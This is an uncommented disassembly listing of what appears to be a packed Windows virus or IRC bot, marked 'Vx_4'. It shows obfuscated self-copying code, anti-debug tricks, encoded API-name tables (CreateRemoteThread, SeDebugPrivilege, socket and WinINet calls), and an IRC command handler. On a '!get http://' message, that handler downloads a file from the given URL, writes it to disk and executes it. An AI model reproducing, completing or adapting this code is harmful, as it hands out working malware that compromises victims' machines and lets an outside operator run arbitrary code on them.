dd 0B82A8486h, 88001039h, 1039B885h, 0F7E0E200h, 1039C085h
dd 800h, 80097500h, 1039BABDh, 0C5740100h, 39C085F7h, 10h
dd 1B741000h, 39B8BD80h, 74050010h, 0B9BD80B0h, 5001039h
dd 0BD80A774h, 1039BAh, 0F79E7405h, 1039C085h, 40000000h
dd 80097400h, 1039B8BDh, 89770200h, 4300A583h, 0E8000010h
dd 0FFFFF272h, 0FFFD43E8h, 271E8FFh, 9D8B0000h, 1042B8h
dd 42BC9D03h, 5BE80010h, 0FFFFFFCh, 25184h, 0B4B58B00h
dd 8B001042h, 0DE033C5Eh, 0FFFD5CE8h, 3B820FFFh, 81000002h
dd 60244Ah, 0FE8BE000h, 7A035652h, 107A0314h, 39C085F7h
dd 10h, 14752000h, 4304BD89h, 0B58D0010h, 1039CCh, 10698D8Bh
dd 0A4F30010h, 0A73B957h, 0B58D0000h, 101000h, 0B1A5F3h
dd 0A4F302E3h, 39C085F7h, 10h, 840F2000h, 0AEh, 0E82873FFh
dd 0FFFFED9Dh, 42F4958Bh, 0D2850010h, 98840Fh, 0B58B0000h
dd 1042B4h, 81104A8Bh, 60244Ah, 4A2BE000h, 33027308h, 147203C9h
dd 10698D3Bh, 8D8B0010h, 101069h, 3C8B5672h, 69A58324h
dd 1010h, 69A783h, 8B000000h, 4A01087Ah, 87F70308h, 0C8858BF7h
dd 0F7001042h, 1039C085h, 4000h, 0F7027400h, 0C720318h
dd 0B5893029h, 104300h, 128738Bh, 0C085F730h, 40001039h
dd 74000000h, 5118F702h, 0FFFC2BE8h, 0CEB59FFh, 2B287303h
dd 56510C72h, 595FA4F3h, 39CCB58Dh, 0BD890010h, 104304h
dd 5E5FA4F3h, 8D92310Fh, 13787h, 0BE953A00h, 75001039h
dd 78D26906h, 66123456h, 0E8E75089h, 0FFFFD9E1h, 0C4A8B5Ah
dd 0F7104A03h, 1039C085h, 0
dd 5418D20h, 8D891375h, 104300h, 10698503h, 0A7830010h
dd 69h, 28432B00h, 548789h, 85F70000h, 103F7Ch, 1, 43C70774h
dd 0A0A0A008h, 0C085F7A0h, 1039h, 74004000h, 5BE85207h
dd 5AFFFFF7h, 43008D8Bh, 5E30010h, 0EB284B89h, 0FC8D8B0Dh
dd 0E3001042h, 8B03EB02h, 85F7284Bh, 1039C0h, 3, 858B1474h
dd 104304h, 42EC8D03h, 85030010h, 1042E8h, 4A8B0801h, 0B8858B10h
dd 39001042h, 373084Ah, 1084A89h, 63831042h, 858B0058h
dd 1042C0h, 29CC68h, 8420100h, 50430159h, 39BE958Ah, 85F70010h
dd 1039C0h, 20000000h, 8D030674h, 101069h, 85F700B6h, 1039C0h
dd 20000h, 0C6FE1475h, 39C085F7h, 10h, 6750004h, 39BFB58Ah
dd 85F70010h, 1039C0h, 4000h, 78A0B75h, 2AAC202h, 0EBF7E2D6h
dd 32078A09h, 0D602AAC2h
db 0E2h, 0F7h
; ---------------------------------------------------------------------------
loc_3100B94A: ; CODE XREF: UPX2:3100B54B�j
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
cmp dword ptr [ebp+104298h], 0
jz near ptr dword_3100AFE8+437h
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
; ---------------------------------------------------------------------------
db 0E8h
align 10h
dd 81016A5Dh, 1038CBEDh, 0FF05800h, 158885C1h, 0C0850010h
dd 0FFC883C3h, 85C10FF0h, 101588h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FAB5E805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 4184B58Dh, 508B0010h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 3F2E95FFh
dd 0C4830010h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFA62E8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 1DE8h
dd 20C200h, 30B8h, 10E800h, 24C20000h, 185B800h, 3E80000h
dd 0C2000000h, 548D002Ch, 2ECD0C24h, 7C00F883h, 0E86019h
dd 8B000000h, 5D302454h, 0ED811A8Bh, 1039A2h, 0FFE0B3E8h
dd 4C261FFh, 7010200h, 40060305h, 877622D4h, 0C8E896h
dd 8B6B0000h, 0FFh, 124h dup(0)
dd 47000000h, 0AD7C809Bh, 317C8308h, 7C9103h, 126h dup(0)
dd 9800h, 1300h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
cld
push ebp
mov ebp, esp
call sub_3101101F
cmc
clc
call sub_310110C4
stc
stc
mov ebp, 12FFC0h ; DATA XREF: sub_3101101F+C�w
cmc
mov eax, eax
jmp loc_31011056
start endp
; =============== S U B R O U T I N E =======================================
sub_3101101F proc near ; CODE XREF: start+4�p
push dword ptr fs:0
mov fs:0, esp
mov dword ptr ds:loc_31011012+1, ebp
xchg ebx, ebx
nop
cmc
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push 80000000h
push 80000000h
push ecx
push ecx
push ecx
push ecx
push 80000000h
push ecx
push ecx
call ds:dword_31007090 ; GetProcAddress
loc_31011056: ; CODE XREF: start+1A�j
xchg ebx, ebx
mov eax, eax
sub edi, edi
sub ecx, ecx
xchg ebx, ebx
mov cl, 42h
jmp short $+2
jmp short $+2
loc_31011066: ; CODE XREF: sub_3101101F+4D�j
lea edi, [edi+1]
xchg ebx, ebx
dec ecx
jnz short loc_31011066
xchg ebx, ebx
call sub_31011087
mov eax, eax
sub_3101101F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31011077 proc near ; CODE XREF: sub_31011087:loc_31011098�p
xchg al, [ebx]
jmp short $+2
sub ax, di
cld
mov [ebx], al
jmp short $+2
cmc
retn
sub_31011077 endp
; ---------------------------------------------------------------------------
db 87h, 0DBh
; =============== S U B R O U T I N E =======================================
sub_31011087 proc near ; CODE XREF: sub_3101101F+51�p
pop ebx
add ebx, 62h
push ebx
xor esi, esi
or esi, 29CCh
cld
loc_31011098: ; CODE XREF: sub_31011087+23�j
call sub_31011077
nop
mov eax, eax
inc ebx
inc edi
dec esi
xchg ebx, ebx
xchg ebx, ebx
clc
or esi, esi
jnz short loc_31011098
pop ebx
clc
mov edi, [ebp-8]
mov fs:0, edi
xchg ebx, ebx
stc
leave
stc
stc
jmp short $+2
jmp ebx
sub_31011087 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
stc
cld
; =============== S U B R O U T I N E =======================================
sub_310110C4 proc near ; CODE XREF: start+B�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_310110C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 89h, 0C0h
; ---------------------------------------------------------------------------
cmc
jmp short $+2
cld
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_31011124
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_31011118
mov ebx, [eax+29C1h]
jmp short loc_31011122
; ---------------------------------------------------------------------------
loc_31011118: ; CODE XREF: UPX2:3101110E�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_31011122: ; CODE XREF: UPX2:31011116�j
mov ebx, [ebx]
loc_31011124: ; CODE XREF: UPX2:310110F6�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 80DCh
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_31011152
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_31011152: ; CODE XREF: UPX2:3101114B�j
and ebx, 0FFFFF000h
loc_31011158: ; CODE XREF: UPX2:31011167�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31011169
loc_31011161: ; CODE XREF: UPX2:31011176�j
sub ebx, 100h
jnz short loc_31011158
loc_31011169: ; CODE XREF: UPX2:3101115F�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_31011161
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_31011183: ; CODE XREF: UPX2:loc_31011197�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_31011197
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3101119C
loc_31011197: ; CODE XREF: UPX2:3101118C�j
loop loc_31011183
pop ecx
jmp short loc_310111C7
; ---------------------------------------------------------------------------
loc_3101119C: ; CODE XREF: UPX2:31011195�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3101120E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31011255
loc_310111C7: ; CODE XREF: UPX2:3101119A�j
; sub_31011255+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_310111F3
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_310111F3: ; CODE XREF: sub_31011255-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_31011255
; ---------------------------------------------------------------------------
db 7Ah, 26h, 53h
; ---------------------------------------------------------------------------
mov ecx, 2889h
mov ebx, edx
loc_310111FF: ; CODE XREF: UPX2:3101120A�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_310111FF
pop ebx
retn
; ---------------------------------------------------------------------------
loc_3101120E: ; CODE XREF: UPX2:310111C5�j
call near ptr loc_3101121D+2
inc ebx
insb
outsd
jnb short near ptr loc_3101127A+3
dec eax
popa
outsb
db 64h
insb
loc_3101121D: ; CODE XREF: UPX2:loc_3101120E�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_31011239+1
inc ebx
jb short loc_31011295
popa
jz short near ptr loc_31011297+1
inc ebp
jbe short near ptr loc_31011297+4
outsb
jz short loc_3101127A
loc_31011239: ; CODE XREF: UPX2:31011228�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_31011255
inc edi
db 65h
jz short near ptr loc_31011297+1
popa
jnb short near ptr loc_310112C1+2
inc ebp
jb short near ptr loc_310112C1+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31011255 proc near ; CODE XREF: UPX2:31011243�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 310111C7 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3101160B SIZE 0000000B BYTES
push ebx
call esi ; InternetCloseHandle
mov [ebp+103E6Ah], eax
call sub_31011636
test eax, eax
jz loc_310111C7
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3101160B
loc_3101127A: ; CODE XREF: UPX2:31011237�j
; UPX2:31011216�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_31011297
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_31011295: ; CODE XREF: UPX2:3101122E�j
jmp short loc_3101129E
; ---------------------------------------------------------------------------
loc_31011297: ; CODE XREF: sub_31011255+2C�j
; UPX2:31011231�j ...
and dword ptr [ebp+101598h], 0
loc_3101129E: ; CODE XREF: sub_31011255:loc_31011295�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_310112C1: ; CODE XREF: UPX2:3101124D�j
; UPX2:31011250�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_31011673
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_310113BA
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3101160B
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3101160B
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3101160B
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_310113AA
jmp loc_3101160B
; ---------------------------------------------------------------------------
loc_310113AA: ; CODE XREF: sub_31011255+14B�p
; sub_31011255+162�j
push 1
pop ecx
jecxz short locret_310113B9
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_310113AA
; ---------------------------------------------------------------------------
locret_310113B9: ; CODE XREF: sub_31011255+158�j
retn
; ---------------------------------------------------------------------------
loc_310113BA: ; CODE XREF: sub_31011255+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3101160B
call near ptr loc_310113D1+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_310113D1: ; CODE XREF: sub_31011255+172�p
add bh, bh
sub_31011255 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_31011673
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3101160B
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3101160B
mov ecx, [ebp+103F06h]
jecxz short loc_3101145A
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_3101145A
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_3101145A: ; CODE XREF: UPX2:3101143E�j
; UPX2:3101144F�j
call sub_31011617
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_310114A3: ; CODE XREF: UPX2:310114AC�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_310114A3
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3101160B
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h, 54h, 6Ah
dd 0FFFF6A20h, 103F1A95h, 5FC08500h, 4FE83475h, 0E8000001h
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 50E85700h
dd 0FF000005h, 104288B5h, 9E95FF00h, 5700103Eh, 3E6295FFh
dd 6A0010h, 95FF026Ah, 103E92h, 128B9h, 0E12B9700h, 54240C89h
dd 0D695FF57h, 3300103Eh, 72A583F6h, 103Fh, 95FF5754h
dd 103EDAh, 6674C085h, 4FE8346h, 74FFEE72h, 6A0824h, 95FF2A6Ah
dd 103ED2h, 0DC74C085h, 588E893h, 0C9330000h, 393AE391h
dd 103F7285h, 81327500h, 6324247Ch, 74737273h, 0AFC18128h
dd 5000000Eh, 51565054h, 0FF535050h, 103E8A95h, 59C08500h
dd 74FF0F74h, 858F0824h, 103F72h, 0FFFDB5E8h, 95FF53FFh
dd 103E62h, 0C4818EEBh, 128h, 6295FF57h
db 3Eh, 10h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31011255
loc_3101160B: ; CODE XREF: sub_31011255+1F�j
; sub_31011255+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_310111C7
; END OF FUNCTION CHUNK FOR sub_31011255
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_31011617 proc near ; CODE XREF: UPX2:loc_3101145A�p
; sub_31011636+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_31011617 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
align 2
; =============== S U B R O U T I N E =======================================
sub_31011636 proc near ; CODE XREF: sub_31011255+9�p
; UPX2:loc_31012031�p
xor ecx, ecx
call sub_31011617
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_31011636 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 58h
dd 28005858h, 73000033h, 0Eh, 2 dup(0)
dd 0C0000000h, 29h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_31011673 proc near ; CODE XREF: sub_31011255+7C�p
; UPX2:310113E9�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3101167E: ; CODE XREF: sub_31011673+E�j
lodsb
test al, al
jnz short loc_3101167E
loop sub_31011673
retn
sub_31011673 endp
; ---------------------------------------------------------------------------
dw 958Dh
dd 101985h, 0C695FF52h, 8900103Eh, 10428885h, 16E800h
dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6E95FF50h, 8900103Eh, 10428C85h, 425CC300h
dd 4E657361h, 64656D61h, 656A624Fh, 5C737463h, 65537456h
dd 6C007463h, 6C727473h, 43006E65h, 74616572h, 6C694665h
dd 43004165h, 74616572h, 6C694665h, 70614D65h, 676E6970h
dd 72430041h, 65746165h, 636F7250h, 41737365h, 65724300h
dd 52657461h, 746F6D65h, 72685465h, 646165h, 61657243h
dd 68546574h, 64616572h, 65724300h, 54657461h, 686C6F6Fh
dd 33706C65h, 616E5332h, 6F687370h, 78450074h, 68547469h
dd 64616572h, 6C694600h, 6D695465h, 536F5465h, 65747379h
dd 6D69546Dh, 72460065h, 694C6565h, 72617262h, 65470079h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 74654700h
dd 656C6946h, 657A6953h, 74654700h, 656C6946h, 656D6954h
dd 74654700h, 75646F4Dh, 6148656Ch, 656C646Eh, 65470041h
dd 6D655474h, 6C694670h, 6D614E65h, 47004165h, 65547465h
dd 6150706Dh, 416874h, 56746547h, 69737265h, 47006E6Fh
dd 65567465h, 6F697372h, 4178456Eh, 74654700h, 756C6F56h
dd 6E49656Dh, 6D726F66h, 6F697461h, 4C00416Eh, 4C64616Fh
dd 61726269h, 417972h, 5670614Dh, 4F776569h, 6C694666h
dd 704F0065h, 69466E65h, 614D656Ch, 6E697070h, 4F004167h
dd 506E6570h, 65636F72h, 50007373h, 65636F72h, 32337373h
dd 73726946h, 72500074h, 7365636Fh, 4E323373h, 747865h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 53004173h
dd 69467465h, 6954656Ch, 5300656Dh, 7065656Ch, 73795300h
dd 546D6574h, 54656D69h, 6C69466Fh, 6D695465h, 6E550065h
dd 5670616Dh, 4F776569h, 6C694666h, 69560065h, 61757472h
dd 6C6C416Ch, 5700636Fh, 65746972h, 656C6946h, 41744E00h
dd 73756A64h, 69725074h, 656C6976h, 54736567h, 6E656B6Fh
dd 43744E00h, 74616572h, 6C694665h, 744E0065h, 61657243h
dd 72506574h, 7365636Fh, 744E0073h, 61657243h, 72506574h
dd 7365636Fh, 784573h, 7243744Eh, 65746165h, 74636553h
dd 6E6F69h, 7243744Eh, 65746165h, 72657355h, 636F7250h
dd 737365h, 614D744Eh, 65695670h, 53664F77h, 69746365h
dd 4E006E6Fh, 65704F74h, 6C69466Eh, 744E0065h, 6E65704Fh
dd 636F7250h, 54737365h, 6E656B6Fh, 4F744E00h, 536E6570h
dd 69746365h, 4E006E6Fh, 6F725074h, 74636574h, 74726956h
dd 4D6C6175h, 726F6D65h, 744E0079h, 72657551h, 666E4979h
dd 616D726Fh, 6E6F6974h, 656B6F54h, 744E006Eh, 74697257h
dd 72695665h, 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h
dd 646F6369h, 72745365h, 54676E69h, 736E416Fh, 72745369h
dd 676E69h, 53415357h, 74726174h, 63007075h, 65736F6Ch
dd 6B636F73h, 63007465h, 656E6E6Fh, 67007463h, 6F687465h
dd 79627473h, 656D616Eh, 63657200h, 65730076h, 7300646Eh
dd 656B636Fh, 6E490074h, 6E726574h, 6C437465h, 4865736Fh
dd 6C646E61h, 6E490065h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 65746E49h, 74656E72h
dd 6E65704Fh, 6E490041h, 6E726574h, 704F7465h, 72556E65h
dd 4900416Ch, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 41564441h, 32334950h, 4C4C442Eh, 67655200h, 736F6C43h
dd 79654B65h, 67655200h, 6E65704Fh, 4579654Bh, 52004178h
dd 75516765h, 56797265h, 65756C61h, 417845h, 53676552h
dd 61567465h, 4565756Ch, 56004178h, 26AF633h, 0D48B5656h
dd 0FF52016Ah, 0FF561872h, 10428C95h, 56C48B00h, 56505656h
dd 0FF1870FFh, 103EFA95h, 10C48300h, 8C25Eh, 2BFB498Dh
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 3F2295FFh, 0C4830010h
dd 2A95FF0Ch, 8300103Fh, 8DC308C4h, 103E3095h, 6AC93300h
dd 30685200h, 8B003200h, 6A5151C4h, 6A515040h, 8C08318h
dd 500E6A54h, 3F1E95FFh, 0C4830010h, 85D23320h, 0C2990FC0h
dd 2358DAF7h, 3357C3C2h, 0FFC1E8FFh, 840FFFFFh, 0A5h, 73286850h
dd 0D48B0000h, 0CC8B006Ah, 68406Ah, 6A001000h, 6A5202h
dd 732868h, 51006A00h, 95FF5053h, 103F12h, 95FF595Fh, 103E62h
dd 7174FF85h, 15908D8Bh, 0CE30010h, 1000958Dh, 0D1030010h
dd 0D2FF5357h, 3EFE858Bh, 8F8D0010h, 2916h, 0FFFF2BE8h
dd 16858BFFh, 8D00103Fh, 29638Fh, 0FF1AE800h, 858BFFFFh
dd 103F02h, 296A8F8Dh, 9E80000h, 8BFFFFFFh, 103F0685h
dd 74C08500h, 778F8D20h, 0E8000029h, 0FFFFFEF4h, 3F0E858Bh
dd 0C0850010h, 8F8D0B74h, 2984h, 0FFFEDFE8h, 5FC78BFFh
dd 0E855C3h, 5D000000h, 1B24ED81h, 0C9330010h, 1EAF858Dh
dd 54510010h, 51505151h, 8E95FF51h, 8700103Eh, 95FF2404h
dd 103E62h, 4C25Dh, 0E855h, 815D0000h, 101B53EDh, 8DFF6A00h
dd 101B1E95h, 0CD525000h, 2A002420h, 0CC48300h, 6485C766h
dd 0CD00101Bh, 6685C720h, 2400101Bh, 5D002A00h, 581A6AC3h
dd 9E8h, 61428D00h, 75C9FEAAh, 9569C3F0h, 103F7Ch, 8088405h
dd 7C958942h, 0F700103Fh, 0E855C3E2h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101BADh
mov ebx, [ebp+103F80h]
cmp dword ptr [esp+8], 0
jz loc_31011D55
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+103EB6h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_31011CC2+1
push esi
push edx
push edx
loc_31011CC2: ; CODE XREF: UPX2:31011CBA�p
add [edi-1], dl
xchg eax, ebp
mov dl, 3Eh
adc [eax], al
xor ecx, ecx
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr [ebp+103E7Eh]
xchg eax, esi
test esi, esi
jz short loc_31011D45
loc_31011CEA: ; CODE XREF: UPX2:31011D18�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr [ebp+103F5Eh]
pop ecx
test eax, eax
jz short loc_31011D1A
jecxz short loc_31011D1A
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr [ebp+103EF6h]
pop ecx
test eax, eax
jnz short loc_31011CEA
loc_31011D1A: ; CODE XREF: UPX2:31011D02�j
; UPX2:31011D04�j
push esi
call dword ptr [ebp+103E62h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+103E86h]
loc_31011D45: ; CODE XREF: UPX2:31011CE8�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+103F4Eh]
loc_31011D55: ; CODE XREF: UPX2:31011C96�j
push ebx
call dword ptr [ebp+103F4Eh]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_31011D66
inc esi
loc_31011D66: ; CODE XREF: UPX2:31011D63�j
mov ecx, [ebp+10158Ch]
jecxz short loc_31011D87
lea edx, [ebp+101000h]
add edx, ecx
push esi
call edx
test al, al
js loc_31011EA0
jz loc_31011E97
loc_31011D87: ; CODE XREF: UPX2:31011D6C�j
cmp byte ptr [esi], 3Ah
jnz short loc_31011D9C
loc_31011D8C: ; CODE XREF: UPX2:31011D99�j
inc esi
cmp byte ptr [esi], 0
jz loc_31011E97
cmp byte ptr [esi], 20h
jnz short loc_31011D8C
inc esi
loc_31011D9C: ; CODE XREF: UPX2:31011D8A�j
cmp dword ptr [esi], 474E4950h
jnz short loc_31011DE6
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+103F46h]
pop ecx
cmp eax, ecx
jnz loc_31011EA0
lea eax, [ebp+101EA3h]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+103F46h]
cmp eax, 0Ch
jnz loc_31011EA0
jmp loc_31011E97
; ---------------------------------------------------------------------------
loc_31011DE6: ; CODE XREF: UPX2:31011DA2�j
cmp dword ptr [esi], 56495250h
jnz loc_31011E97
add esi, 8
loc_31011DF5: ; CODE XREF: UPX2:31011E00�j
lodsb
cmp al, 0Dh
jz loc_31011E97
cmp al, 20h
jnz short loc_31011DF5
lodsb
cmp al, 3Ah
jnz loc_31011E97
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_31011E97
lodsb
cmp al, 20h
jnz short loc_31011E99
cmp dword ptr [esi-1], 74746820h
jnz short loc_31011E97
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_31011E97
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr [ebp+103EE6h]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_31011E55+2
inc esp
outsd
ja short loc_31011EC0
insb
outsd
popa
loc_31011E55: ; CODE XREF: UPX2:31011E49�p
db 64h
add bh, bh
xchg eax, ebp
push esi
aas
adc [eax], al
test eax, eax
jz short loc_31011E97
xor ecx, ecx
mov [ebp+103F80h], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+103F5Ah]
lea edx, [ebp+101BA7h]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
loc_31011E97: ; CODE XREF: UPX2:31011D81�j
; UPX2:31011D90�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_31011E99: ; CODE XREF: UPX2:31011E1B�j
or byte ptr [ebp+10157Fh], 1
loc_31011EA0: ; CODE XREF: UPX2:31011D7B�j
; UPX2:31011DBB�j ...
stc
retn
; ---------------------------------------------------------------------------
push 1
push 1
push dword ptr [ebx]
push dword ptr [ebx+4]
